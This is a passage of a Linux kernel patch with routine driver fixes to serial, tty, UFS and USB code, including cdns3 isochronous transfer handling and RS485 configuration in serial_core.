+ 			dev_err(&pdev->dev, "failed to request irq: %d\n", ret);
+-			return ret;
++			goto err_clk;
+ 		}
+ 	}
+ 
+@@ -2494,7 +2483,12 @@ static int imx_uart_probe(struct platform_device *pdev)
+ 
+ 	platform_set_drvdata(pdev, sport);
+ 
+-	return uart_add_one_port(&imx_uart_uart_driver, &sport->port);
++	ret = uart_add_one_port(&imx_uart_uart_driver, &sport->port);
++
++err_clk:
++	clk_disable_unprepare(sport->clk_ipg);
++
++	return ret;
+ }
+ 
+ static int imx_uart_remove(struct platform_device *pdev)
+diff --git a/drivers/tty/serial/omap-serial.c b/drivers/tty/serial/omap-serial.c
+index 7d0d2718ef595..beb7896ebf8ae 100644
+--- a/drivers/tty/serial/omap-serial.c
++++ b/drivers/tty/serial/omap-serial.c
+@@ -1512,6 +1512,13 @@ static struct omap_uart_port_info *of_get_uart_port_info(struct device *dev)
+ 	return omap_up_info;
+ }
+ 
++static const struct serial_rs485 serial_omap_rs485_supported = {
++	.flags = SER_RS485_ENABLED | SER_RS485_RTS_ON_SEND | SER_RS485_RTS_AFTER_SEND |
++		 SER_RS485_RX_DURING_TX,
++	.delay_rts_before_send = 1,
++	.delay_rts_after_send = 1,
++};
++
+ static int serial_omap_probe_rs485(struct uart_omap_port *up,
+ 				   struct device *dev)
+ {
+@@ -1526,6 +1533,9 @@ static int serial_omap_probe_rs485(struct uart_omap_port *up,
+ 	if (!np)
+ 		return 0;
+ 
++	up->port.rs485_config = serial_omap_config_rs485;
++	up->port.rs485_supported = serial_omap_rs485_supported;
++
+ 	ret = uart_get_rs485_mode(&up->port);
+ 	if (ret)
+ 		return ret;
+@@ -1560,13 +1570,6 @@ static int serial_omap_probe_rs485(struct uart_omap_port *up,
+ 	return 0;
+ }
+ 
+-static const struct serial_rs485 serial_omap_rs485_supported = {
+-	.flags = SER_RS485_ENABLED | SER_RS485_RTS_ON_SEND | SER_RS485_RTS_AFTER_SEND |
+-		 SER_RS485_RX_DURING_TX,
+-	.delay_rts_before_send = 1,
+-	.delay_rts_after_send = 1,
+-};
+-
+ static int serial_omap_probe(struct platform_device *pdev)
+ {
+ 	struct omap_uart_port_info *omap_up_info = dev_get_platdata(&pdev->dev);
+@@ -1634,17 +1637,11 @@ static int serial_omap_probe(struct platform_device *pdev)
+ 		dev_info(up->port.dev, "no wakeirq for uart%d\n",
+ 			 up->port.line);
+ 
+-	ret = serial_omap_probe_rs485(up, &pdev->dev);
+-	if (ret < 0)
+-		goto err_rs485;
+-
+ 	sprintf(up->name, "OMAP UART%d", up->port.line);
+ 	up->port.mapbase = mem->start;
+ 	up->port.membase = base;
+ 	up->port.flags = omap_up_info->flags;
+ 	up->port.uartclk = omap_up_info->uartclk;
+-	up->port.rs485_config = serial_omap_config_rs485;
+-	up->port.rs485_supported = serial_omap_rs485_supported;
+ 	if (!up->port.uartclk) {
+ 		up->port.uartclk = DEFAULT_CLK_SPEED;
+ 		dev_warn(&pdev->dev,
+@@ -1652,6 +1649,10 @@ static int serial_omap_probe(struct platform_device *pdev)
+ 			 DEFAULT_CLK_SPEED);
+ 	}
+ 
++	ret = serial_omap_probe_rs485(up, &pdev->dev);
++	if (ret < 0)
++		goto err_rs485;
++
+ 	up->latency = PM_QOS_CPU_LATENCY_DEFAULT_VALUE;
+ 	up->calc_latency = PM_QOS_CPU_LATENCY_DEFAULT_VALUE;
+ 	cpu_latency_qos_add_request(&up->pm_qos_request, up->latency);
+diff --git a/drivers/tty/serial/sc16is7xx.c b/drivers/tty/serial/sc16is7xx.c
+index b4b849415c503..db33790e66754 100644
+--- a/drivers/tty/serial/sc16is7xx.c
++++ b/drivers/tty/serial/sc16is7xx.c
+@@ -24,6 +24,7 @@
+ #include <linux/tty_flip.h>
+ #include <linux/spi/spi.h>
+ #include <linux/uaccess.h>
++#include <linux/units.h>
+ #include <uapi/linux/sched/types.h>
+ 
+ #define SC16IS7XX_NAME			"sc16is7xx"
+@@ -1716,9 +1717,12 @@ static int sc16is7xx_spi_probe(struct spi_device *spi)
+ 
+ 	/* Setup SPI bus */
+ 	spi->bits_per_word	= 8;
+-	/* only supports mode 0 on SC16IS762 */
++	/* For all variants, only mode 0 is supported */
++	if ((spi->mode & SPI_MODE_X_MASK) != SPI_MODE_0)
++		return dev_err_probe(&spi->dev, -EINVAL, "Unsupported SPI mode\n");
++
+ 	spi->mode		= spi->mode ? : SPI_MODE_0;
+-	spi->max_speed_hz	= spi->max_speed_hz ? : 15000000;
++	spi->max_speed_hz	= spi->max_speed_hz ? : 4 * HZ_PER_MHZ;
+ 	ret = spi_setup(spi);
+ 	if (ret)
+ 		return ret;
+diff --git a/drivers/tty/serial/serial_core.c b/drivers/tty/serial/serial_core.c
+index d4e57f9017db9..f0ed30d0a697c 100644
+--- a/drivers/tty/serial/serial_core.c
++++ b/drivers/tty/serial/serial_core.c
+@@ -1353,19 +1353,27 @@ static void uart_sanitize_serial_rs485(struct uart_port *port, struct serial_rs4
+ 		return;
+ 	}
+ 
++	rs485->flags &= supported_flags;
++
+ 	/* Pick sane settings if the user hasn't */
+-	if ((supported_flags & (SER_RS485_RTS_ON_SEND|SER_RS485_RTS_AFTER_SEND)) &&
+-	    !(rs485->flags & SER_RS485_RTS_ON_SEND) ==
++	if (!(rs485->flags & SER_RS485_RTS_ON_SEND) ==
+ 	    !(rs485->flags & SER_RS485_RTS_AFTER_SEND)) {
+-		dev_warn_ratelimited(port->dev,
+-			"%s (%d): invalid RTS setting, using RTS_ON_SEND instead\n",
+-			port->name, port->line);
+-		rs485->flags |= SER_RS485_RTS_ON_SEND;
+-		rs485->flags &= ~SER_RS485_RTS_AFTER_SEND;
+-		supported_flags |= SER_RS485_RTS_ON_SEND|SER_RS485_RTS_AFTER_SEND;
+-	}
++		if (supported_flags & SER_RS485_RTS_ON_SEND) {
++			rs485->flags |= SER_RS485_RTS_ON_SEND;
++			rs485->flags &= ~SER_RS485_RTS_AFTER_SEND;
+ 
+-	rs485->flags &= supported_flags;
++			dev_warn_ratelimited(port->dev,
++				"%s (%d): invalid RTS setting, using RTS_ON_SEND instead\n",
++				port->name, port->line);
++		} else {
++			rs485->flags |= SER_RS485_RTS_AFTER_SEND;
++			rs485->flags &= ~SER_RS485_RTS_ON_SEND;
++
++			dev_warn_ratelimited(port->dev,
++				"%s (%d): invalid RTS setting, using RTS_AFTER_SEND instead\n",
++				port->name, port->line);
++		}
++	}
+ 
+ 	uart_sanitize_serial_rs485_delays(port, rs485);
+ 
+@@ -1428,7 +1436,7 @@ static int uart_set_rs485_config(struct tty_struct *tty, struct uart_port *port,
+ 	int ret;
+ 	unsigned long flags;
+ 
+-	if (!port->rs485_config)
++	if (!(port->rs485_supported.flags & SER_RS485_ENABLED))
+ 		return -ENOTTY;
+ 
+ 	if (copy_from_user(&rs485, rs485_user, sizeof(*rs485_user)))
+@@ -3420,6 +3428,9 @@ int uart_get_rs485_mode(struct uart_port *port)
+ 	u32 rs485_delay[2];
+ 	int ret;
+ 
++	if (!(port->rs485_supported.flags & SER_RS485_ENABLED))
++		return 0;
++
+ 	ret = device_property_read_u32_array(dev, "rs485-rts-delay",
+ 					     rs485_delay, 2);
+ 	if (!ret) {
+diff --git a/drivers/tty/tty.h b/drivers/tty/tty.h
+index c5ee219127555..91515e1ebc8d3 100644
+--- a/drivers/tty/tty.h
++++ b/drivers/tty/tty.h
+@@ -63,7 +63,7 @@ int tty_check_change(struct tty_struct *tty);
+ void __stop_tty(struct tty_struct *tty);
+ void __start_tty(struct tty_struct *tty);
+ void tty_write_unlock(struct tty_struct *tty);
+-int tty_write_lock(struct tty_struct *tty, int ndelay);
++int tty_write_lock(struct tty_struct *tty, bool ndelay);
+ void tty_vhangup_session(struct tty_struct *tty);
+ void tty_open_proc_set_tty(struct file *filp, struct tty_struct *tty);
+ int tty_signal_session_leader(struct tty_struct *tty, int exit_session);
+diff --git a/drivers/tty/tty_io.c b/drivers/tty/tty_io.c
+index 8fb6c6853556a..aaf77a5616ff1 100644
+--- a/drivers/tty/tty_io.c
++++ b/drivers/tty/tty_io.c
+@@ -939,7 +939,7 @@ void tty_write_unlock(struct tty_struct *tty)
+ 	wake_up_interruptible_poll(&tty->write_wait, EPOLLOUT);
+ }
+ 
+-int tty_write_lock(struct tty_struct *tty, int ndelay)
++int tty_write_lock(struct tty_struct *tty, bool ndelay)
+ {
+ 	if (!mutex_trylock(&tty->atomic_write_lock)) {
+ 		if (ndelay)
+@@ -1153,7 +1153,7 @@ int tty_send_xchar(struct tty_struct *tty, char ch)
+ 		return 0;
+ 	}
+ 
+-	if (tty_write_lock(tty, 0) < 0)
++	if (tty_write_lock(tty, false) < 0)
+ 		return -ERESTARTSYS;
+ 
+ 	down_read(&tty->termios_rwsem);
+@@ -2472,22 +2472,25 @@ static int send_break(struct tty_struct *tty, unsigned int duration)
+ 		return 0;
+ 
+ 	if (tty->driver->flags & TTY_DRIVER_HARDWARE_BREAK)
+-		retval = tty->ops->break_ctl(tty, duration);
+-	else {
+-		/* Do the work ourselves */
+-		if (tty_write_lock(tty, 0) < 0)
+-			return -EINTR;
+-		retval = tty->ops->break_ctl(tty, -1);
+-		if (retval)
+-			goto out;
+-		if (!signal_pending(current))
+-			msleep_interruptible(duration);
++		return tty->ops->break_ctl(tty, duration);
++
++	/* Do the work ourselves */
++	if (tty_write_lock(tty, false) < 0)
++		return -EINTR;
++
++	retval = tty->ops->break_ctl(tty, -1);
++	if (!retval) {
++		msleep_interruptible(duration);
+ 		retval = tty->ops->break_ctl(tty, 0);
+-out:
+-		tty_write_unlock(tty);
+-		if (signal_pending(current))
+-			retval = -EINTR;
++	} else if (retval == -EOPNOTSUPP) {
++		/* some drivers can tell only dynamically */
++		retval = 0;
+ 	}
++	tty_write_unlock(tty);
++
++	if (signal_pending(current))
++		retval = -EINTR;
++
+ 	return retval;
+ }
+ 
+diff --git a/drivers/tty/tty_ioctl.c b/drivers/tty/tty_ioctl.c
+index ad1cf51ecd11d..8767c504b95dd 100644
+--- a/drivers/tty/tty_ioctl.c
++++ b/drivers/tty/tty_ioctl.c
+@@ -506,7 +506,7 @@ retry_write_wait:
+ 		if (retval < 0)
+ 			return retval;
+ 
+-		if (tty_write_lock(tty, 0) < 0)
++		if (tty_write_lock(tty, false) < 0)
+ 			goto retry_write_wait;
+ 
+ 		/* Racing writer? */
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index dc38d1fa77874..474e94a69b185 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -8204,7 +8204,6 @@ static int ufshcd_add_lus(struct ufs_hba *hba)
+ 	ufs_bsg_probe(hba);
+ 	ufshpb_init(hba);
+ 	scsi_scan_host(hba->host);
+-	pm_runtime_put_sync(hba->dev);
+ 
+ out:
+ 	return ret;
+@@ -8331,15 +8330,15 @@ static void ufshcd_async_scan(void *data, async_cookie_t cookie)
+ 
+ 	/* Probe and add UFS logical units  */
+ 	ret = ufshcd_add_lus(hba);
++
+ out:
++	pm_runtime_put_sync(hba->dev);
+ 	/*
+ 	 * If we failed to initialize the device or the device is not
+ 	 * present, turn off the power/clocks etc.
+ 	 */
+-	if (ret) {
+-		pm_runtime_put_sync(hba->dev);
++	if (ret)
+ 		ufshcd_hba_exit(hba);
+-	}
+ }
+ 
+ static const struct attribute_group *ufshcd_driver_groups[] = {
+diff --git a/drivers/usb/cdns3/cdns3-gadget.c b/drivers/usb/cdns3/cdns3-gadget.c
+index 69a44bd7e5d02..ccdd525bd7c80 100644
+--- a/drivers/usb/cdns3/cdns3-gadget.c
++++ b/drivers/usb/cdns3/cdns3-gadget.c
+@@ -1117,6 +1117,8 @@ static int cdns3_ep_run_transfer(struct cdns3_endpoint *priv_ep,
+ 	dma_addr_t trb_dma;
+ 	u32 togle_pcs = 1;
+ 	int sg_iter = 0;
++	int num_trb_req;
++	int trb_burst;
+ 	int num_trb;
+ 	int address;
+ 	u32 control;
+@@ -1125,15 +1127,13 @@ static int cdns3_ep_run_transfer(struct cdns3_endpoint *priv_ep,
+ 	struct scatterlist *s = NULL;
+ 	bool sg_supported = !!(request->num_mapped_sgs);
+ 
++	num_trb_req = sg_supported ? request->num_mapped_sgs : 1;
++
++	/* ISO transfer require each SOF have a TD, each TD include some TRBs */
+ 	if (priv_ep->type == USB_ENDPOINT_XFER_ISOC)
+-		num_trb = priv_ep->interval;
++		num_trb = priv_ep->interval * num_trb_req;
+ 	else
+-		num_trb = sg_supported ? request->num_mapped_sgs : 1;
+-
+-	if (num_trb > priv_ep->free_trbs) {
+-		priv_ep->flags |= EP_RING_FULL;
+-		return -ENOBUFS;
+-	}
++		num_trb = num_trb_req;
+ 
+ 	priv_req = to_cdns3_request(request);
+ 	address = priv_ep->endpoint.desc->bEndpointAddress;
+@@ -1182,14 +1182,31 @@ static int cdns3_ep_run_transfer(struct cdns3_endpoint *priv_ep,
+ 
+ 		link_trb->control = cpu_to_le32(((priv_ep->pcs) ? TRB_CYCLE : 0) |
+ 				    TRB_TYPE(TRB_LINK) | TRB_TOGGLE | ch_bit);
++
++		if (priv_ep->type == USB_ENDPOINT_XFER_ISOC) {
++			/*
++			 * ISO require LINK TRB must be first one of TD.
++			 * Fill LINK TRBs for left trb space to simply software process logic.
++			 */
++			while (priv_ep->enqueue) {
++				*trb = *link_trb;
++				trace_cdns3_prepare_trb(priv_ep, trb);
++
++				cdns3_ep_inc_enq(priv_ep);
++				trb = priv_ep->trb_pool + priv_ep->enqueue;
++				priv_req->trb = trb;
++			}
++		}
++	}
++
++	if (num_trb > priv_ep->free_trbs) {
++		priv_ep->flags |= EP_RING_FULL;
++		return -ENOBUFS;
+ 	}
+ 
+ 	if (priv_dev->dev_ver <= DEV_VER_V2)
+ 		togle_pcs = cdns3_wa1_update_guard(priv_ep, trb);
+ 
+-	if (sg_supported)
+-		s = request->sg;
+-
+ 	/* set incorrect Cycle Bit for first trb*/
+ 	control = priv_ep->pcs ? 0 : TRB_CYCLE;
+ 	trb->length = 0;
+@@ -1207,6 +1224,9 @@ static int cdns3_ep_run_transfer(struct cdns3_endpoint *priv_ep,
+ 	do {
+ 		u32 length;
+ 
++		if (!(sg_iter % num_trb_req) && sg_supported)
++			s = request->sg;
++
+ 		/* fill TRB */
+ 		control |= TRB_TYPE(TRB_NORMAL);
+ 		if (sg_supported) {
+@@ -1221,7 +1241,36 @@ static int cdns3_ep_run_transfer(struct cdns3_endpoint *priv_ep,
+ 			total_tdl += DIV_ROUND_UP(length,
+ 					       priv_ep->endpoint.maxpacket);
+ 
+-		trb->length |= cpu_to_le32(TRB_BURST_LEN(priv_ep->trb_burst_size) |
++		trb_burst = priv_ep->trb_burst_size;
++
++		/*
++		 * Supposed DMA cross 4k bounder problem should be fixed at DEV_VER_V2, but still
++		 * met problem when do ISO transfer if sg enabled.
++		 *
++		 * Data pattern likes below when sg enabled, package size is 1k and mult is 2
++		 *       [UVC Header(8B) ] [data(3k - 8)] ...
++		 *
++		 * The received data at offset 0xd000 will get 0xc000 data, len 0x70. Error happen
++		 * as below pattern:
++		 *	0xd000: wrong
++		 *	0xe000: wrong
++		 *	0xf000: correct
++		 *	0x10000: wrong
++		 *	0x11000: wrong
++		 *	0x12000: correct
++		 *	...
++		 *
++		 * But it is still unclear about why error have not happen below 0xd000, it should
++		 * cross 4k bounder. But anyway, the below code can fix this problem.
++		 *
++		 * To avoid DMA cross 4k bounder at ISO transfer, reduce burst len according to 16.
++		 */
++		if (priv_ep->type == USB_ENDPOINT_XFER_ISOC && priv_dev->dev_ver <= DEV_VER_V2)
++			if (ALIGN_DOWN(trb->buffer, SZ_4K) !=
++			    ALIGN_DOWN(trb->buffer + length, SZ_4K))
++				trb_burst = 16;
++
++		trb->length |= cpu_to_le32(TRB_BURST_LEN(trb_burst) |
+ 					TRB_LEN(length));
+ 		pcs = priv_ep->pcs ? TRB_CYCLE : 0;
+ 
+@@ -1248,7 +1297,7 @@ static int cdns3_ep_run_transfer(struct cdns3_endpoint *priv_ep,
+ 		if (sg_supported) {
+ 			trb->control |= cpu_to_le32(TRB_ISP);
+ 			/* Don't set chain bit for last TRB */
+-			if (sg_iter < num_trb - 1)
++			if ((sg_iter % num_trb_req) < num_trb_req - 1)
+ 				trb->control |= cpu_to_le32(TRB_CHAIN);
+ 
+ 			s = sg_next(s);
+@@ -1506,6 +1555,12 @@ static void cdns3_transfer_completed(struct cdns3_device *priv_dev,
+ 
+ 		/* The TRB was changed as link TRB, and the request was handled at ep_dequeue */
+ 		while (TRB_FIELD_TO_TYPE(le32_to_cpu(trb->control)) == TRB_LINK) {
++
++			/* ISO ep_traddr may stop at LINK TRB */
++			if (priv_ep->dequeue == cdns3_get_dma_pos(priv_dev, priv_ep) &&
++			    priv_ep->type == USB_ENDPOINT_XFER_ISOC)
++				break;
++
+ 			trace_cdns3_complete_trb(priv_ep, trb);
+ 			cdns3_ep_inc_deq(priv_ep);
+ 			trb = priv_ep->trb_pool + priv_ep->dequeue;
+@@ -1538,6 +1593,10 @@ static void cdns3_transfer_completed(struct cdns3_device *priv_dev,
+ 			}
+ 
+ 			if (request_handled) {
++				/* TRBs are duplicated by priv_ep->interval time for ISO IN */
++				if (priv_ep->type == USB_ENDPOINT_XFER_ISOC && priv_ep->dir)
++					request->actual /= priv_ep->interval;
++
+ 				cdns3_gadget_giveback(priv_ep, priv_req, 0);
+ 				request_handled = false;
+ 				transfer_end = false;
+@@ -2033,11 +2092,10 @@ int cdns3_ep_config(struct cdns3_endpoint *priv_ep, bool enable)
+ 	bool is_iso_ep = (priv_ep->type == USB_ENDPOINT_XFER_ISOC);
+ 	struct cdns3_device *priv_dev = priv_ep->cdns3_dev;
+ 	u32 bEndpointAddress = priv_ep->num | priv_ep->dir;
+-	u32 max_packet_size = 0;
+-	u8 maxburst = 0;
++	u32 max_packet_size = priv_ep->wMaxPacketSize;
++	u8 maxburst = priv_ep->bMaxBurst;
+ 	u32 ep_cfg = 0;
+ 	u8 buffering;
+-	u8 mult = 0;
+ 	int ret;
+ 
+ 	buffering = priv_dev->ep_buf_size - 1;
+@@ -2059,8 +2117,7 @@ int cdns3_ep_config(struct cdns3_endpoint *priv_ep, bool enable)
+ 		break;
+ 	default:
+ 		ep_cfg = EP_CFG_EPTYPE(USB_ENDPOINT_XFER_ISOC);
+-		mult = priv_dev->ep_iso_burst - 1;
+-		buffering = mult + 1;
++		buffering = (priv_ep->bMaxBurst + 1) * (priv_ep->mult + 1) - 1;
+ 	}
+ 
+ 	switch (priv_dev->gadget.speed) {
+@@ -2071,17 +2128,8 @@ int cdns3_ep_config(struct cdns3_endpoint *priv_ep, bool enable)
+ 		max_packet_size = is_iso_ep ? 1024 : 512;
+ 		break;
+ 	case USB_SPEED_SUPER:
+-		/* It's limitation that driver assumes in driver. */
+-		mult = 0;
+-		max_packet_size = 1024;
+-		if (priv_ep->type == USB_ENDPOINT_XFER_ISOC) {
+-			maxburst = priv_dev->ep_iso_burst - 1;
+-			buffering = (mult + 1) *
+-				    (maxburst + 1);
+-
+-			if (priv_ep->interval > 1)
+-				buffering++;
+-		} else {
++		if (priv_ep->type != USB_ENDPOINT_XFER_ISOC) {
++			max_packet_size = 1024;
+ 			maxburst = priv_dev->ep_buf_size - 1;
+ 		}
+ 		break;
+@@ -2110,7 +2158,6 @@ int cdns3_ep_config(struct cdns3_endpoint *priv_ep, bool enable)
+ 	if (priv_dev->dev_ver < DEV_VER_V2)
+ 		priv_ep->trb_burst_size = 16;
+ 
+-	mult = min_t(u8, mult, EP_CFG_MULT_MAX);
+ 	buffering = min_t(u8, buffering, EP_CFG_BUFFERING_MAX);
+ 	maxburst = min_t(u8, maxburst, EP_CFG_MAXBURST_MAX);
+ 
+@@ -2144,7 +2191,7 @@ int cdns3_ep_config(struct cdns3_endpoint *priv_ep, bool enable)
+ 	}
+ 
+ 	ep_cfg |= EP_CFG_MAXPKTSIZE(max_packet_size) |
+-		  EP_CFG_MULT(mult) |
++		  EP_CFG_MULT(priv_ep->mult) |			/* must match EP setting */
+ 		  EP_CFG_BUFFERING(buffering) |
+ 		  EP_CFG_MAXBURST(maxburst);
+ 
+@@ -2234,6 +2281,13 @@ usb_ep *cdns3_gadget_match_ep(struct usb_gadget *gadget,
+ 	priv_ep->type = usb_endpoint_type(desc);
+ 	priv_ep->flags |= EP_CLAIMED;
+ 	priv_ep->interval = desc->bInterval ? BIT(desc->bInterval - 1) : 0;
++	priv_ep->wMaxPacketSize =  usb_endpoint_maxp(desc);
++	priv_ep->mult = USB_EP_MAXP_MULT(priv_ep->wMaxPacketSize);
++	priv_ep->wMaxPacketSize &= USB_ENDPOINT_MAXP_MASK;
++	if (priv_ep->type == USB_ENDPOINT_XFER_ISOC && comp_desc) {
++		priv_ep->mult =  USB_SS_MULT(comp_desc->bmAttributes) - 1;
++		priv_ep->bMaxBurst = comp_desc->bMaxBurst;
++	}
+ 
+ 	spin_unlock_irqrestore(&priv_dev->lock, flags);
+ 	return &priv_ep->endpoint;
+@@ -3015,22 +3069,40 @@ static int cdns3_gadget_check_config(struct usb_gadget *gadget)
+ 	struct cdns3_endpoint *priv_ep;
+ 	struct usb_ep *ep;
+ 	int n_in = 0;
++	int iso = 0;
++	int out = 1;
+ 	int total;
++	int n;
+ 
+ 	list_for_each_entry(ep, &gadget->ep_list, ep_list) {
+ 		priv_ep = ep_to_cdns3_ep(ep);
+-		if ((priv_ep->flags & EP_CLAIMED) && (ep->address & USB_DIR_IN))
+-			n_in++;
++		if (!(priv_ep->flags & EP_CLAIMED))
++			continue;
++
++		n = (priv_ep->mult + 1) * (priv_ep->bMaxBurst + 1);
++		if (ep->address & USB_DIR_IN) {
++			/*
++			 * ISO transfer: DMA start move data when get ISO, only transfer
++			 * data as min(TD size, iso). No benefit for allocate bigger
++			 * internal memory than 'iso'.
++			 */
++			if (priv_ep->type == USB_ENDPOINT_XFER_ISOC)
++				iso += n;
++			else
++				n_in++;
++		} else {
++			if (priv_ep->type == USB_ENDPOINT_XFER_ISOC)
++				out = max_t(int, out, n);
++		}
+ 	}
+ 
+ 	/* 2KB are reserved for EP0, 1KB for out*/
+-	total = 2 + n_in + 1;
++	total = 2 + n_in + out + iso;
+ 
+ 	if (total > priv_dev->onchip_buffers)
+ 		return -ENOMEM;
+ 
+-	priv_dev->ep_buf_size = priv_dev->ep_iso_burst =
+-			(priv_dev->onchip_buffers - 2) / (n_in + 1);
++	priv_dev->ep_buf_size = (priv_dev->onchip_buffers - 2 - iso) / (n_in + out);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/usb/cdns3/cdns3-gadget.h b/drivers/usb/cdns3/cdns3-gadget.h
+index fbe4a8e3aa897..086a7bb838975 100644
+--- a/drivers/usb/cdns3/cdns3-gadget.h
++++ b/drivers/usb/cdns3/cdns3-gadget.h
+@@ -1168,6 +1168,9 @@ struct cdns3_endpoint {
+ 	u8			dir;
+ 	u8			num;
+ 	u8			type;
++	u8			mult;
++	u8			bMaxBurst;
++	u16			wMaxPacketSize;
+ 	int			interval;
+ 
+ 	int			free_trbs;
+diff --git a/drivers/usb/chipidea/core.c b/drivers/usb/chipidea/core.c
+index b9227f41cf1c0..763d6858a8e6f 100644
+--- a/drivers/usb/chipidea/core.c
++++ b/drivers/usb/chipidea/core.c
+@@ -523,6 +523,13 @@ static irqreturn_t ci_irq_handler(int irq, void *data)
+ 	u32 otgsc = 0;
+ 
+ 	if (ci->in_lpm) {
++		/*
++		 * If we already have a wakeup irq pending there,
++		 * let's just return to wait resume finished firstly.
++		 */
++		if (ci->wakeup_int)
++			return IRQ_HANDLED;
++
+ 		disable_irq_nosync(irq);
+ 		ci->wakeup_int = true;
+ 		pm_runtime_get(ci->dev);
+diff --git a/drivers/usb/class/cdc-acm.c b/drivers/usb/class/cdc-acm.c
+index 36bf051b345b8..2a7eea4e251a1 100644
+--- a/drivers/usb/class/cdc-acm.c
++++ b/drivers/usb/class/cdc-acm.c
+@@ -892,6 +892,9 @@ static int acm_tty_break_ctl(struct tty_struct *tty, int state)
+ 	struct acm *acm = tty->driver_data;
+ 	int retval;
+ 
++	if (!(acm->ctrl_caps & USB_CDC_CAP_BRK))
++		return -EOPNOTSUPP;
++
+ 	retval = acm_send_break(acm, state ? 0xffff : 0);
+ 	if (retval < 0)
+ 		dev_dbg(&acm->control->dev,
+diff --git a/drivers/usb/dwc3/core.c b/drivers/usb/dwc3/core.c
+index 1f23c96fa94f8..011a3909f9ad1 100644
+--- a/drivers/usb/dwc3/core.c
++++ b/drivers/usb/dwc3/core.c
+@@ -277,48 +277,11 @@ int dwc3_core_soft_reset(struct dwc3 *dwc)
+ 	/*
+ 	 * We're resetting only the device side because, if we're in host mode,
+ 	 * XHCI driver will reset the host block. If dwc3 was configured for
+-	 * host-only mode or current role is host, then we can return early.
++	 * host-only mode, then we can return early.
+ 	 */
+ 	if (dwc->current_dr_role == DWC3_GCTL_PRTCAP_HOST)
+ 		return 0;
+ 
+-	/*
+-	 * If the dr_mode is host and the dwc->current_dr_role is not the
+-	 * corresponding DWC3_GCTL_PRTCAP_HOST, then the dwc3_core_init_mode
+-	 * isn't executed yet. Ensure the phy is ready before the controller
+-	 * updates the GCTL.PRTCAPDIR or other settings by soft-resetting
+-	 * the phy.
+-	 *
+-	 * Note: GUSB3PIPECTL[n] and GUSB2PHYCFG[n] are port settings where n
+-	 * is port index. If this is a multiport host, then we need to reset
+-	 * all active ports.
+-	 */
+-	if (dwc->dr_mode == USB_DR_MODE_HOST) {
+-		u32 usb3_port;
+-		u32 usb2_port;
+-
+-		usb3_port = dwc3_readl(dwc->regs, DWC3_GUSB3PIPECTL(0));
+-		usb3_port |= DWC3_GUSB3PIPECTL_PHYSOFTRST;
+-		dwc3_writel(dwc->regs, DWC3_GUSB3PIPECTL(0), usb3_port);
+-
+-		usb2_port = dwc3_readl(dwc->regs, DWC3_GUSB2PHYCFG(0));
+-		usb2_port |= DWC3_GUSB2PHYCFG_PHYSOFTRST;
+-		dwc3_writel(dwc->regs, DWC3_GUSB2PHYCFG(0), usb2_port);
+-
+-		/* Small delay for phy reset assertion */
+-		usleep_range(1000, 2000);
+-
+-		usb3_port &= ~DWC3_GUSB3PIPECTL_PHYSOFTRST;
+-		dwc3_writel(dwc->regs, DWC3_GUSB3PIPECTL(0), usb3_port);
+-
+-		usb2_port &= ~DWC3_GUSB2PHYCFG_PHYSOFTRST;
+-		dwc3_writel(dwc->regs, DWC3_GUSB2PHYCFG(0), usb2_port);
+-
+-		/* Wait for clock synchronization */
+-		msleep(50);
+-		return 0;
+-	}
+-
+ 	reg = dwc3_readl(dwc->regs, DWC3_DCTL);
+ 	reg |= DWC3_DCTL_CSFTRST;
+ 	reg &= ~DWC3_DCTL_RUN_STOP;
+diff --git a/drivers/usb/dwc3/ep0.c b/drivers/usb/dwc3/ep0.c
+index 61de693461da4..ec3c33266547c 100644
+--- a/drivers/usb/dwc3/ep0.c
++++ b/drivers/usb/dwc3/ep0.c
+@@ -236,7 +236,10 @@ void dwc3_ep0_stall_and_restart(struct dwc3 *dwc)
+ 		struct dwc3_request	*req;
+ 
+ 		req = next_request(&dep->pending_list);
+-		dwc3_gadget_giveback(dep, req, -ECONNRESET);
++		if (!dwc->connected)
++			dwc3_gadget_giveback(dep, req, -ESHUTDOWN);
++		else
++			dwc3_gadget_giveback(dep, req, -ECONNRESET);
+ 	}
+ 
+ 	dwc->eps[0]->trb_enqueue = 0;
+diff --git a/drivers/usb/host/xhci-mtk.c b/drivers/usb/host/xhci-mtk.c
+index a0921687444b1..bb4f80627cdc3 100644
+--- a/drivers/usb/host/xhci-mtk.c
++++ b/drivers/usb/host/xhci-mtk.c
+@@ -7,6 +7,7 @@
+  *  Chunfeng Yun <chunfeng.yun@mediatek.com>
+  */
+ 
++#include <linux/bitfield.h>
+ #include <linux/dma-mapping.h>
+ #include <linux/iopoll.h>
+ #include <linux/kernel.h>
+@@ -73,6 +74,9 @@
+ #define FRMCNT_LEV1_RANG	(0x12b << 8)
+ #define FRMCNT_LEV1_RANG_MASK	GENMASK(19, 8)
+ 
++#define HSCH_CFG1		0x960
++#define SCH3_RXFIFO_DEPTH_MASK	GENMASK(21, 20)
++
+ #define SS_GEN2_EOF_CFG		0x990
+ #define SSG2EOF_OFFSET		0x3c
+ 
+@@ -114,6 +118,8 @@
+ #define SSC_IP_SLEEP_EN	BIT(4)
+ #define SSC_SPM_INT_EN		BIT(1)
+ 
++#define SCH_FIFO_TO_KB(x)	((x) >> 10)
++
+ enum ssusb_uwk_vers {
+ 	SSUSB_UWK_V1 = 1,
+ 	SSUSB_UWK_V2,
+@@ -165,6 +171,35 @@ static void xhci_mtk_set_frame_interval(struct xhci_hcd_mtk *mtk)
+ 	writel(value, hcd->regs + SS_GEN2_EOF_CFG);
+ }
+ 
++/*
++ * workaround: usb3.2 gen1 isoc rx hw issue
++ * host send out unexpected ACK afer device fininsh a burst transfer with
++ * a short packet.
++ */
++static void xhci_mtk_rxfifo_depth_set(struct xhci_hcd_mtk *mtk)
++{
++	struct usb_hcd *hcd = mtk->hcd;
++	u32 value;
++
++	if (!mtk->rxfifo_depth)
++		return;
++
++	value = readl(hcd->regs + HSCH_CFG1);
++	value &= ~SCH3_RXFIFO_DEPTH_MASK;
++	value |= FIELD_PREP(SCH3_RXFIFO_DEPTH_MASK,
++			    SCH_FIFO_TO_KB(mtk->rxfifo_depth) - 1);
++	writel(value, hcd->regs + HSCH_CFG1);
++}
++
++static void xhci_mtk_init_quirk(struct xhci_hcd_mtk *mtk)
++{
++	/* workaround only for mt8195 */
++	xhci_mtk_set_frame_interval(mtk);
++
++	/* workaround for SoCs using SSUSB about before IPM v1.6.0 */
